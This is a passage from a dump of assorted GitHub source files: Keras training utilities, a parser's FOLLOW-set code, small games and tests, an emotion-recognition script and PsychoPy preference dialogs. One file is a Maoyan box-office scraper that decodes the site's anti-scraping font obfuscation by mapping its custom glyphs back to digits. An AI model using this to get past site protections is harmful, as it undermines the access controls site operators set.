 clean_model):\n (x_train, y_train), (x_valid, y_valid), (x_test, y_test) = self.final_data\n model = models.clone_model(clean_model)\n model.compile(\n optimizer=self.params.get(\"optimizer\"), loss=self.loss, metrics=self.metrics\n )\n batchsize = self.params.get(\"batchsize\")\n history = model.fit(\n x_train,\n y_train,\n epochs=self.max_epochs,\n validation_data=(x_valid, y_valid),\n batch_size=batchsize,\n callbacks=[\n EarlyStopping(\n monitor=\"loss\",\n patience=self.early_stop_train_patience,\n restore_best_weights=True,\n verbose=self.verbose,\n start_from_epoch=8,\n ),\n EarlyStopping(\n monitor=\"val_loss\",\n patience=self.early_stop_valid_patience,\n restore_best_weights=True,\n verbose=self.verbose,\n start_from_epoch=8,\n ),\n ],\n verbose=self.verbose,\n shuffle=False,\n )\n self.epochs_record = history.history\n epochs = len(history.history[\"loss\"])\n loss = model.evaluate(x_train, y_train, batch_size=batchsize, verbose=0)[0]\n val_loss = model.evaluate(x_valid, y_valid, batch_size=batchsize, verbose=0)[0]\n test_loss = []\n if self.test_data is not None:\n timestamp = self.params.get(\"timestamp\")\n for test in self.test_data:\n x_test, y_test = group_data(test, timestamp, self.model_class.target_function)\n test_loss.append(model.evaluate(x_test, y_test, batch_size=batchsize, verbose=0)[0])\n elif len(x_test)>0:\n test_loss.append(model.evaluate(x_test, y_test, batch_size=batchsize, verbose=0)[0])\n self.model = model\n return epochs, loss, val_loss, test_loss\n\n\nclass ModelTest(ModelOperation):\n def __init__(self, model_class, data, options, *args, **kwargs):\n super().__init__(model_class=model_class, data=data, *args, **kwargs)\n self.final_options = [\n (k, (v if isinstance(v, list) else [v]))\n for k, v in options.items()\n if not (isinstance(v, list) and len(v) == 0)\n ]\n for name1, param1 in self.defalut_params.items():\n found = False\n for name2, param2 in self.final_options:\n if name1 == name2:\n found = True\n if not found:\n self.final_options.append((name1, [param1]))\n self.current_options = [None] * len(self.final_options)\n\n def process_options(self):\n self.final_data = list(self.raw_data)\n self.params = {}\n for i in range(len(self.layer_options)):\n self.layer_options[i] = None\n for i, (name, options) in enumerate(self.final_options):\n option_idx = self.current_options[i]\n option = options[option_idx]\n if name == \"preprocess\" and option is not None:\n for j in range(3):\n if self.test_data and j==2: continue\n self.final_data[j] = option.transform(self.final_data[j])\n if name[:5] == \"layer\":\n layer_number = int(name[5:])\n self.layer_options[layer_number] = option\n self.params[name] = option\n timestamp = self.params.get(\"timestamp\")\n for i in range(3):\n self.final_data[i] = group_data(self.final_data[i], timestamp, self.model_class.target_function)\n\n def run(self):\n self.history = []\n self.test(0)\n output_path = os.path.join(\"test_results\", str(int(time.time())) + \".csv\")\n pd.DataFrame(\n data=self.history,\n columns=list(next(zip(*self.final_options)))\n + [\"avg_epochs\", \"avg_loss\", \"avg_valid_loss\"] + [f\"avg_test_loss_{i}\" for i in range(len(self.test_data or []))],\n ).to_csv(output_path)\n\n def test(self, option_idx):\n if option_idx == len(self.final_options):\n return self.build_and_train()\n name, options = self.final_options[option_idx]\n for i, v in enumerate(options):\n self.current_options[option_idx] = i\n self.test(option_idx + 1)\n\n def build_and_train(self):\n self.process_options()\n 
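# Each option combination below is trained num_train_per_config times and\n # the averaged (epochs, loss, val_loss, test losses) row is kept in history.\n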
print(\"=================================================================\")\n [\n print(f\"{name:12}: {self.params.get(name) or 'No Change'}\")\n for name in self.params.keys()\n ]\n print()\n model = self.build()\n # model.summary()\n train_results = []\n # labels = [\"round\", \"epochs\", \"train\", \"valid\", \"test\"]\n # print(\"{:>8} {:>8} {:>8} {:>8} {:>8}\".format(*labels))\n for i in range(self.num_train_per_config):\n record = self.train(model)\n record = list(record[:-1]) + list(record[-1])\n train_results.append(record)\n # print(\"{:8} {:8.0f} {:8.4f} {:8.4f} {:8.4f}\".format(i, *record))\n record = [sum(i) / len(i) for i in zip(*train_results)]\n print((\"{:>8} {:8.0f}\"+\" {:8.4f}\"*(len(record)-1)).format(\"avg\", *record))\n self.history.append(\n [self.params.get(name) or \"No Change\" for name in self.params.keys()]\n + record\n )\n print(\"-----------------------------------------------------------------\\n\")\n\n\nclass ModelTrain(ModelOperation):\n def __init__(self, model_class, data, options, *args, **kwargs):\n super().__init__(model_class=model_class, data=data, *args, **kwargs)\n for name, param in options.items():\n self.params[name] = param\n\n option = self.params.get(\"preprocess\")\n self.final_data = list(self.raw_data)\n if option is not None:\n for i in range(3):\n if self.test_data and i==2: continue\n self.final_data[i] = option.transform(self.final_data[i]) \n for i in range(3):\n self.final_data[i] = group_data(\n self.final_data[i], self.params.get(\"timestamp\"), self.model_class.target_function\n )\n\n def run(self):\n print(\"=================================================================\")\n [\n print(f\"{name:12}: {self.params.get(name) or 'No Change'}\")\n for name in self.params.keys()\n ]\n print()\n model = self.build()\n train_results = []\n # labels = [\"round\", \"epochs\", \"train\", \"valid\", \"test\"]\n # print(\"{:>8} {:>8} {:>8} {:>8} {:>8}\".format(*labels))\n models = []\n # for i in range(self.num_train_per_config):\n record = self.train(model)\n train_results.append(record)\n print(record)\n # print(\"{:8} {:8.0f} {:8.4f} {:8.4f} {:8.4f}\".format(i, *record))\n # models.append(self.model)\n try:\n # number = int(input(\"Enter the round number to save model: \"))\n # self.save_model(models[number], self.epochs_record)\n self.save_model(self.model, self.epochs_record)\n except Exception as e:\n print(e)\n print(\"Model not saved.\")\n print(\"-----------------------------------------------------------------\\n\")\n\n\n def save_model(self, model, record):\n join = os.path.join\n model_path = join(\"model\", str(int(time.time())))\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n models.save_model(model, join(model_path, 'model.h5'))\n output_path = join(model_path, 'history.csv')\n pd.DataFrame(data=record).to_csv(output_path)\n with open(join(model_path, 'info.txt'), 'w') as f:\n # labels = [\"epochs\", \"train\", \"valid\", \"test\"]\n # f.write(\"{:>8} {:>8} {:>8} {:>8}\\n\".format(*labels))\n # f.write(\"{:8.0f} {:8.4f} {:8.4f} {:8.4f}\\n\\n\".format(*record))\n [f.write(f'{str(k)}: {str(v)}\\n') for k, v in self.params.items()]\n print(f\"Model saved to <{model_path}>.\")\n","repo_name":"huangruoqi/computer_vision_learning","sub_path":"src/mutils.py","file_name":"mutils.py","file_ext":"py","file_size_in_byte":14832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43912766408","text":"import first\n\ndef FOLLOW_(rule_list, VN, FIRST):\n\n change = 
1\n FOLLOW = {}\n FOLLOW[\"root\"] = {'#'}\n for Vn in VN:\n if not FOLLOW.__contains__(Vn):\n FOLLOW[Vn] = set()\n for rule in rule_list:\n curr_number = rule.num\n curr_left = rule.left\n curr_right = rule.right\n curr_words = curr_right.split()\n i = 0\n for word in curr_words:\n if word == Vn:\n after = ' '.join(curr_words[i+1 :])\n after_f = first.FIRST_sequence(after, FIRST)\n FOLLOW[Vn] = FOLLOW[Vn] | (after_f-{'$'})\n i += 1\n \n while(change != 0):\n change = 0\n for Vn in VN:\n for rule in rule_list:\n curr_number = rule.num\n curr_left = rule.left\n curr_right = rule.right\n curr_words = curr_right.split()\n i = 0\n for word in curr_words:\n if word == Vn:\n after = ' '.join(curr_words[i+1:])\n after_f = first.FIRST_sequence(after,FIRST)\n if ('$' in after_f) or (i == (len(curr_words)-1)):\n before_len = len(FOLLOW[Vn])\n FOLLOW[Vn] = FOLLOW[Vn] | FOLLOW[curr_left]\n after_len = len(FOLLOW[Vn])\n if before_len != after_len:\n change += 1\n i += 1\n\n with open(\"FOLLOW.txt\", \"w\") as fp:\n for nonTerminalToken in VN:\n fp.write(nonTerminalToken + \"=\" + '[' + ','.join(FOLLOW[nonTerminalToken]) + ']' + '\\n')\n\n print(\"Finish making FOLLOW set as shown in FOLLOW.txt\")\n\n return FOLLOW","repo_name":"lllirunze/Compilation_Lab","sub_path":"syntactic_analyzer/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42371579327","text":"from pygame import sprite, Rect, Surface\n\nclass Counter(sprite.Sprite):\n def __init__(self, font, text, value, colour, position, scale):\n super().__init__()\n self.font = font\n self.text = text\n self.value = value\n self.colour = colour\n self.scale = scale\n self.text_surf = self.font.render(f\"{self.text}: {self.value}\", False, self.colour)\n self.image = Surface(scale).convert()\n self.image.set_colorkey((0, 0, 0))\n self.rect = Rect(position, scale)\n \n self.image.blit(self.text_surf, (10, 10))\n \n def update(self):\n self.text_surf = self.font.render(f\"{self.text}: {self.value}\", False, self.colour)\n self.image = Surface(self.scale).convert()\n self.image.set_colorkey((0, 0, 0))\n self.image.blit(self.text_surf, (10, 10))","repo_name":"Zain-Jaafar/Typing-Game","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70735193124","text":"from utils import Utils\nimport speech_recognition as sr\n\n\nclass listener:\n\n def listen(noiseControl=0):\n r = sr.Recognizer()\n with sr.Microphone() as source:\n if noiseControl != 0:\n print(\"Please wait. 
 Calibrating microphone...\")\n # sample ambient noise for noiseControl seconds to set the energy threshold\n r.adjust_for_ambient_noise(source, duration=noiseControl)\n print(\"You can now talk..\")\n audio = r.listen(source)\n try:\n return r.recognize_bing(audio, Utils.bingApiKey)\n except sr.UnknownValueError:\n print(Utils.roboName, \"could not understand audio\")\n except sr.RequestError as e:\n print(Utils.roboName, \"error; {0}\".format(e))\n","repo_name":"cunbm/cunbmev3","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29438468205","text":"import numpy as np\nimport cv2\nfrom keras.preprocessing import image\n\nface_cascade = cv2.CascadeClassifier(\"/home/greg/Documents/uni/AI/AI_emotion/haarcascade_frontalface_default.xml\")\n\ncap = cv2.VideoCapture(0)\n#-----------------------------\n#face expression recognizer initialization\n\nfrom keras.models import load_model\nmodel = load_model('my_newm.h5')\n\n#-----------------------------\n\nemotions = ('angry', 'disgust', 'fear', 'happy', 'neutral', 'sad', 'surprise')\n\nwhile(True):\n\n ret, img = cap.read()\n\t#img = cv2.imread('C:/Users/IS96273/Desktop/hababam.jpg')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n #print(faces) #locations of detected faces\n\n for (x,y,w,h) in faces:\n\t cv2.rectangle(img,(x,y),(x+w,y+h),(209,66,244),2) #draw rectangle to main image\n\n\t detected_face = img[int(y):int(y+h), int(x):int(x+w)] #crop detected face\n\t detected_face = cv2.cvtColor(detected_face, cv2.COLOR_BGR2GRAY) #transform to gray scale\n\t detected_face = cv2.resize(detected_face, (48, 48)) #resize to 48x48\n\n\t img_pixels = image.img_to_array(detected_face)\n\t img_pixels = np.expand_dims(img_pixels, axis = 0)\n\n\t img_pixels /= 255 #pixels are in the range [0, 255]; 
 normalize them to the range [0, 1]\n\n\n\n\t predictions = model.predict(img_pixels) #store probabilities of the 7 expressions\n\t #find the index of the max probability: 0:angry, 1:disgust, 2:fear, 3:happy, 4:neutral, 5:sad, 6:surprise\n\t max_index = np.argmax(predictions[0])\n\t emotion = emotions[max_index]\n\t # write emotion text above rectangle\n\t cv2.putText(img, emotion, (int(x), int(y)), cv2.FONT_HERSHEY_DUPLEX, 1, (57,244,0), 2)\n\t #process on detected face end\n\t #-----------------------\n\n print(max_index)\n value = np.amax(predictions)\n print(value)\n\n cv2.imshow('img',img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): #press q to quit\n break\n\n#release OpenCV resources\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"gregtuck/Greco-Roman","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27223312384","text":"import pytest\nfrom faker import Faker\n\nfrom common.modules.memo.infrastructure.entity import MemoEntity\nfrom common.modules.memo.infrastructure.repository import MemoRepositoryProtocol\n\nfrom common.tests import test_db_connect as db, AsyncSQLAlchemy, ko_faker, en_faker\nfrom common.tests.infrastructure.memo import get_memo_repository as memo_repo\n\n\n@pytest.mark.asyncio\nasync def test_fetch_all(en_faker: Faker, ko_faker: Faker, db: AsyncSQLAlchemy, memo_repo: MemoRepositoryProtocol):\n # given\n data = [\n {\n 'title': en_faker.sentence(),\n 'content': en_faker.text(),\n 'labels': en_faker.words()\n }\n for _ in range(3)\n ]\n entities = list(map(lambda md: MemoEntity(**md), data))\n\n async with db.session() as session:\n session.add_all(entities)\n await session.commit()\n\n # when\n result = await memo_repo.fetch_all()\n\n # then\n for memo in result:\n assert not memo.labels\n\n\n@pytest.mark.asyncio\nasync def test_fetch_by_id(en_faker: Faker, ko_faker: Faker, db: AsyncSQLAlchemy, memo_repo: MemoRepositoryProtocol):\n # given\n item_id = en_faker.random_int(1, 3)\n\n # when\n result = await memo_repo.fetch_by_id(item_id)\n\n # then\n assert result.id == item_id\n","repo_name":"NEONKID/python-mf-data-example","sub_path":"common/tests/infrastructure/memo/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"70315710886","text":"from typing import List\n\n\n# Version 1 - closed interval [left, right]\nclass Solution1:\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums) - 1\n while l <= r:\n middle = (l + r) // 2\n if nums[middle] == target:\n return middle\n if target < nums[middle]:\n r = middle - 1\n elif target > nums[middle]:\n l = middle + 1\n return -1\n\n\n# Version 2 - half-open interval [left, right)\nclass Solution2:\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums)\n while l < r:\n middle = (l + r) // 2\n if target == nums[middle]:\n return middle\n elif target < nums[middle]:\n r = middle\n elif target > nums[middle]:\n l = middle + 1\n return -1\n\n\n# Method 3 - recursion\nclass Solution3:\n def search(self, nums: List[int], target: int) -> int:\n def binary_search(nums, target, l, r):\n if l > r:\n return -1\n middle = r + (l - r) // 2\n if target < nums[middle]:\n return binary_search(nums, target, l, middle - 1)\n elif target > nums[middle]:\n return binary_search(nums, target, middle + 1, r)\n else:\n return middle\n\n res = binary_search(nums, target, 0, len(nums) - 1)\n return 
 res\n\n\nif __name__ == '__main__':\n nums1 = [-1, 0, 3, 5, 9, 12]\n target1 = 9\n nums2 = [-1, 0, 3, 5, 9, 12]\n target2 = 2\n s1 = Solution1()\n s2 = Solution2()\n s3 = Solution3()\n print(s1.search(nums1, target1))\n print(s1.search(nums2, target2))\n print(s2.search(nums1, target1))\n print(s2.search(nums2, target2))\n print(s3.search(nums1, target1))\n print(s3.search(nums2, target2))\n","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/数组/704_search.py","file_name":"704_search.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26393248325","text":"import json\nimport requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nfrom fontTools.ttLib import TTFont\nimport re\n\nua = UserAgent()\nurl = 'http://maoyan.com/board/1'\nheaders = {\n 'User-Agent': ua.random\n}\n\n\ndef get_top(response):\n dl_list = response.xpath('//dl[@class=\"board-wrapper\"]/dd')\n # print(len(dl))\n for dl in dl_list:\n # rank\n top = dl.xpath('./i/text()')[0]\n # print(top)\n # title\n name = dl.xpath('.//p[@class=\"name\"]/a/text()')[0]\n # print(name)\n # starring\n starring = dl.xpath('.//p[@class=\"star\"]/text()')[0]\n # print(starring)\n # release time\n show_time = dl.xpath('.//p[@class=\"releasetime\"]/text()')[0]\n # print(show_time)\n\n # real-time box office\n real_time_list = dl.xpath('.//p[@class=\"realtime\"]//text()')\n real_time = real_time_list[0].strip() + real_time_list[1].strip() + real_time_list[2].strip()\n # print(real_time)\n # total box office\n overall_ticket_list = dl.xpath('.//p[@class=\"total-boxoffice\"]//text()')\n overall_ticket = overall_ticket_list[0].strip() + overall_ticket_list[1].strip() + overall_ticket_list[2].strip()\n # print(overall_ticket)\n yield top, name, starring, show_time, real_time, overall_ticket\n\n\n# TODO: the font file of the page being scraped must be saved locally as basefonts.woff\ndef fonts(response_index):\n try:\n # get the URL of the font file\n woff_ = re.search(r\"url\\('(.*\\.woff)'\\)\", response_index).group(1)\n # print(woff_)\n woff_url = 'http:' + woff_\n response_woff = requests.get(woff_url, headers=headers).content\n # save the font file locally; it must be saved on every crawl\n with open('fonts.woff', 'wb') as f:\n f.write(response_woff)\n\n # baseFonts: download the woff file from the font-face url in the site's source and rename it basefonts.woff\n baseFonts = TTFont('basefonts.woff')\n # parse the basefonts.woff file with http://fontstore.baidu.com/static/editor/index.html#\n # base_nums and base_fonts must be mapped by hand and must match basefonts.woff\n base_nums = ['9', '5', '6', '7', '3', '8', '4', '2', '1', '0']\n base_fonts = ['uniF59C', 'uniF65B', 'uniE3C2', 'uniECD9', 'uniE676', 'uniF7AD', 'uniF4B7', 'uniF7F7', 'uniE683', 'uniF044']\n # onlineFonts: parse the font-face url out of the GET response and write it to fonts.woff in binary\n onlineFonts = TTFont('fonts.woff')\n\n # onlineFonts.saveXML('test.xml')\n\n # get the glyph codes of the digits\n uni_list = onlineFonts.getGlyphNames()[1:-1]\n temp = {}\n # parse the font library\n for i in range(10):\n # get the i-th glyph of fonts.woff\n onlineGlyph = onlineFonts['glyf'][uni_list[i]]\n for j in range(10):\n # get the j-th glyph of basefonts.woff\n baseGlyph = baseFonts['glyf'][base_fonts[j]]\n # if the i-th glyph of fonts.woff equals the j-th glyph of basefonts.woff, store the mapping in temp\n if onlineGlyph == baseGlyph:\n # key is \"&#x\" plus the lowercased code of the i-th glyph; value is the j-th base digit\n temp[\"&#x\" + uni_list[i][3:].lower() + ';'] = base_nums[j]\n # print(temp)\n # replace the obfuscated characters\n pat = '(' + '|'.join(temp.keys()) + ')'\n response_index = re.sub(pat, lambda x: temp[x.group()], response_index)\n response = etree.HTML(response_index)\n return response\n except:\n print('解析失败!')\n\n\ndef with_to_file(item):\n # mind the encoding\n with 
 open('content.txt', 'a', encoding='utf8') as f:\n f.write(json.dumps(item, ensure_ascii=False) + '\\n')\n\n\ndef main():\n response_index = requests.get(url, headers=headers).text\n # print(re.text)\n # replace the page's obfuscated font characters\n response = fonts(response_index)\n # scrape the page data\n for item in get_top(response):\n print(item)\n # write to file\n with_to_file(item)\n\n\nif __name__ == '__main__':\n main()","repo_name":"mizhiX/knowledge-point","sub_path":"字体文件反爬/猫眼电影_国内票房榜_字体文件反爬.py","file_name":"猫眼电影_国内票房榜_字体文件反爬.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21430943368","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport sys\nfrom pathlib import Path\n\nimport wx\nimport wx.propgrid as pg\nimport wx.py\nimport platform\nimport re\nimport os\n\nfrom psychopy.app.themes import icons\nfrom . import dialogs\nfrom psychopy import localization, prefs\nfrom psychopy.localization import _translate\nfrom pkg_resources import parse_version\nfrom psychopy import sound\nfrom psychopy.app.utils import getSystemFonts\nimport collections\n\n# label mappings for display:\n_localized = {\n # category labels\n 'General': _translate('General'),\n 'Application': _translate('Application'),\n 'Key Bindings': _translate('Key Bindings'),\n 'Hardware': _translate('Hardware'),\n 'Connections': _translate('Connections'),\n # section labels\n 'general': _translate('general'),\n 'app': _translate('app'),\n 'builder': \"Builder\", # not localized\n 'coder': \"Coder\", # not localized\n 'runner': \"Runner\", # not localized\n 'hardware': _translate('Hardware'),\n 'connections': _translate('Connections'), # not 'connections'\n 'keyBindings': _translate('Key Bindings'), # not 'keyBindings'\n # pref labels in General section\n 'winType': _translate(\"window type\"),\n 'units': _translate(\"units\"),\n 'fullscr': _translate(\"full-screen\"),\n 'allowGUI': _translate(\"allow GUI\"),\n 'paths': _translate('paths'),\n 'flac': _translate('flac audio compression'),\n 'shutdownKey': _translate(\"shutdown key\"),\n 'shutdownKeyModifiers': _translate(\"shutdown key modifier keys\"),\n 'gammaErrorPolicy': _translate(\"gammaErrorPolicy\"),\n 'startUpPlugins': _translate(\"start up plugins\"),\n 'appKeyGoogleCloud':_translate('appKeyGoogleCloud'),\n 'transcrKeyAzure':_translate('transcrKeyAzure'),\n # pref labels in App section\n 'showStartupTips': _translate(\"show start-up tips\"),\n 'defaultView': _translate(\"default view\"),\n 'resetPrefs': _translate('reset preferences'),\n 'autoSavePrefs': _translate('auto-save prefs'),\n 'debugMode': _translate('debug mode'),\n 'locale': _translate('locale'),\n 'errorDialog': _translate('error dialog'),\n 'theme': _translate('theme'),\n # pref labels in Builder section\n 'reloadPrevExp': _translate('reload previous exp'),\n 'codeComponentLanguage': _translate('Code component language'),\n 'unclutteredNamespace': _translate('uncluttered namespace'),\n 'componentsFolders': _translate('components folders'),\n 'componentFilter':_translate('componentFilter'),\n 'hiddenComponents': _translate('hidden components'),\n 'unpackedDemosDir': _translate('unpacked demos dir'),\n 'savedDataFolder': _translate('saved data folder'),\n 'builderLayout': _translate('Builder layout'),\n 'alwaysShowReadme': _translate('always show readme'),\n 'maxFavorites': _translate('max favorites'),\n 'confirmRoutineClose': _translate('confirmRoutineClose'),\n # pref labels in Coder section\n 'readonly': 
_translate('read-only'),\n 'outputFont': _translate('output font'),\n 'codeFont': _translate('code font'),\n 'outputFontSize': _translate('output font size'),\n 'codeFontSize': _translate('code font size'),\n 'lineSpacing': _translate('lineSpacing'),\n 'edgeGuideColumn': _translate('edgeGuideColumn'),\n 'showSourceAsst': _translate('show source asst'),\n 'showOutput': _translate('show output'),\n 'autocomplete': _translate('auto complete'),\n 'reloadPrevFiles': _translate('reload previous files'),\n 'preferredShell': _translate('preferred shell'),\n # pref labels in KeyBindings section\n 'open': _translate('open'),\n 'new': _translate('new'),\n 'save': _translate('save'),\n 'saveAs': _translate('save as'),\n 'print': _translate('print'),\n 'close': _translate('close'),\n 'quit': _translate('quit'),\n 'preferences': _translate('preferences'),\n 'exportHTML': _translate('export HTML'),\n 'cut': _translate('cut'),\n 'copy': _translate('copy'),\n 'paste': _translate('paste'),\n 'duplicate': _translate('duplicate'),\n 'indent': _translate('indent'),\n 'dedent': _translate('dedent'),\n 'smartIndent': _translate('smart indent'),\n 'find': _translate('find'),\n 'findAgain': _translate('find again'),\n 'undo': _translate('undo'),\n 'redo': _translate('redo'),\n 'comment': _translate('comment'),\n 'uncomment': _translate('uncomment'),\n 'toggle comment': _translate('toggle comment'),\n 'fold': _translate('fold'),\n 'enlargeFont': _translate('enlarge Font'),\n 'shrinkFont': _translate('shrink Font'),\n 'analyseCode': _translate('analyze code'),\n 'compileScript': _translate('compile script'),\n 'runScript': _translate('run script'),\n 'runnerScript': _translate('runner script'),\n 'stopScript': _translate('stop script'),\n 'toggleWhitespace': _translate('toggle whitespace'),\n 'toggleEOLs': _translate('toggle EOLs'),\n 'toggleIndentGuides': _translate('toggle indent guides'),\n 'newRoutine': _translate('new Routine'),\n 'copyRoutine': _translate('copy Routine'),\n 'pasteRoutine': _translate('paste Routine'),\n 'pasteCompon': _translate('paste Component'),\n 'toggleOutputPanel': _translate('toggle output panel'),\n 'renameRoutine': _translate('rename Routine'),\n 'cycleWindows': _translate('cycle windows'),\n 'largerFlow': _translate('larger Flow'),\n 'smallerFlow': _translate('smaller Flow'),\n 'largerRoutine': _translate('larger routine'),\n 'smallerRoutine': _translate('smaller routine'),\n 'toggleReadme': _translate('toggle readme'),\n 'pavlovia_logIn': _translate('login to pavlovia'),\n 'OSF_logIn': _translate('login to OSF'),\n 'projectsSync': _translate('sync projects'),\n 'projectsFind': _translate('find projects'),\n 'projectsOpen': _translate('open projects'),\n 'projectsNew': _translate('new projects'),\n # pref labels in Hardware section\n 'audioLib': _translate(\"audio library\"),\n 'audioLatencyMode': _translate(\"audio latency mode\"),\n 'audioDriver': _translate(\"audio driver\"),\n 'audioDevice': _translate(\"audio device\"),\n 'parallelPorts': _translate(\"parallel ports\"),\n 'qmixConfiguration': _translate(\"Qmix configuration\"),\n 'highDPI': _translate('Try to support display high DPI'),\n # pref labels in Connections section\n 'proxy': _translate('proxy'),\n 'autoProxy': _translate('auto-proxy'),\n 'allowUsageStats': _translate('allow usage stats'),\n 'checkForUpdates': _translate('check for updates'),\n 'timeout': _translate('timeout'),\n # pref wxChoice lists:\n 'all': _translate('Builder, Coder and Runner'),\n 'keep': _translate('same as in the file'), # line endings\n 
 'abort': _translate('abort'), # gammaErrorPolicy\n 'warn': _translate('warn'), # gammaErrorPolicy\n # not translated:\n 'pix': 'pix',\n 'deg': 'deg',\n 'cm': 'cm',\n 'norm': 'norm',\n 'height': 'height',\n 'pyshell': 'pyshell',\n 'iPython': 'iPython',\n # obsolete labels\n 'largeIcons': _translate(\"large icons\"),\n 'darkMode': _translate(\"dark mode\"),\n 'highDPI': _translate('highDPI'),\n 'commentFont': _translate('comment font'),\n 'switchToBuilder': _translate('switch to Builder'),\n 'switchToCoder': _translate('switch to Coder'),\n 'switchToRunner': _translate('switch to Runner'),\n 'projectsLogIn': _translate('login to projects'),\n 'useRunner': _translate(\"use Runner\"),\n}\n# add pre-translated names-of-languages, for display in locale pref:\n_localized.update(localization.locname)\n\naudioLatencyLabels = {0: _translate('Latency not important'),\n 1: _translate('Share low-latency driver'),\n 2: _translate('Exclusive low-latency'),\n 3: _translate('Aggressive low-latency'),\n 4: _translate('Latency critical')}\n\n\nclass PrefPropGrid(wx.Panel):\n \"\"\"Class for the property grid portion of the preference window.\"\"\"\n\n def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,\n size=wx.DefaultSize, style=wx.TAB_TRAVERSAL,\n name=wx.EmptyString):\n wx.Panel.__init__(\n self, parent, id=id, pos=pos, size=size, style=style, name=name)\n bSizer1 = wx.BoxSizer(wx.HORIZONTAL)\n self.app = wx.GetApp()\n\n self.lstPrefPages = wx.ListCtrl(\n self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.LC_ALIGN_TOP | wx.LC_ICON | wx.LC_SINGLE_SEL)\n bSizer1.Add(self.lstPrefPages, 0,\n wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.TOP, 5)\n\n prefsImageSize = wx.Size(48, 48)\n self.prefsIndex = 0\n self.prefsImages = wx.ImageList(\n prefsImageSize.GetWidth(), prefsImageSize.GetHeight())\n self.lstPrefPages.AssignImageList(self.prefsImages, wx.IMAGE_LIST_NORMAL)\n\n self.proPrefs = pg.PropertyGridManager(\n self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.propgrid.PGMAN_DEFAULT_STYLE | wx.propgrid.PG_BOLD_MODIFIED |\n wx.propgrid.PG_DESCRIPTION | wx.TAB_TRAVERSAL)\n self.proPrefs.SetExtraStyle(wx.propgrid.PG_EX_MODE_BUTTONS)\n\n bSizer1.Add(self.proPrefs, 1, wx.ALL | wx.EXPAND, 5)\n\n self.SetSizer(bSizer1)\n self.Layout()\n\n # Connect Events\n self.lstPrefPages.Bind(\n wx.EVT_LIST_ITEM_DESELECTED, self.OnPrefPageDeselected)\n self.lstPrefPages.Bind(\n wx.EVT_LIST_ITEM_SELECTED, self.OnPrefPageSelected)\n self.proPrefs.Bind(pg.EVT_PG_CHANGED, self.OnPropPageChanged)\n self.proPrefs.Bind(pg.EVT_PG_CHANGING, self.OnPropPageChanging)\n\n # categories and their items are stored here\n self.sections = collections.OrderedDict()\n\n # pages in the property manager\n self.pages = dict()\n self.pageNames = dict()\n\n # help text\n self.helpText = dict()\n\n self.pageIdx = 0\n\n def __del__(self):\n pass\n\n def setSelection(self, page):\n \"\"\"Select the page.\"\"\"\n # set the page\n self.lstPrefPages.Focus(1)\n self.lstPrefPages.Select(page)\n\n def addPage(self, label, name, sections=(), bitmap=None):\n \"\"\"Add a page to the property grid manager.\"\"\"\n\n if name in self.pages.keys():\n raise ValueError(\"Page already exists.\")\n\n for s in sections:\n if s not in self.sections.keys():\n self.sections[s] = dict()\n\n nbBitmap = icons.ButtonIcon(stem=bitmap, size=(48, 48)).bitmap\n if nbBitmap.IsOk():\n self.prefsImages.Add(nbBitmap)\n\n self.pages[self.pageIdx] = (self.proPrefs.AddPage(name, wx.NullBitmap),\n list(sections))\n self.pageNames[name] = self.pageIdx\n 
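# add a localized entry for this page to the icon list on the left\n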
self.lstPrefPages.InsertItem(\n self.lstPrefPages.GetItemCount(), _localized[label], self.pageIdx)\n\n self.pageIdx += 1\n\n def addStringItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value='', helpText=\"\"):\n \"\"\"Add a string property to a category.\n\n Parameters\n ----------\n section : str\n Category name to add the item too.\n label : str\n Label to be displayed in the property grid.\n name : str\n Internal name for the property.\n value : str\n Default value for the property.\n helpText: str\n Help text for this item.\n\n \"\"\"\n # create a new category if not present\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n # if isinstance(page, str):\n # page = self.proPrefs.GetPageByName(page)\n # else\n # page = self.proPrefs.GetPage(page)\n self.sections[section].update(\n {name: wx.propgrid.StringProperty(label, name, value=str(value))})\n\n self.helpText[name] = helpText\n\n def addStringArrayItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, values=(), helpText=\"\"):\n \"\"\"Add a string array item.\"\"\"\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.ArrayStringProperty(\n label, name, value=[str(i) for i in values])})\n\n self.helpText[name] = helpText\n\n 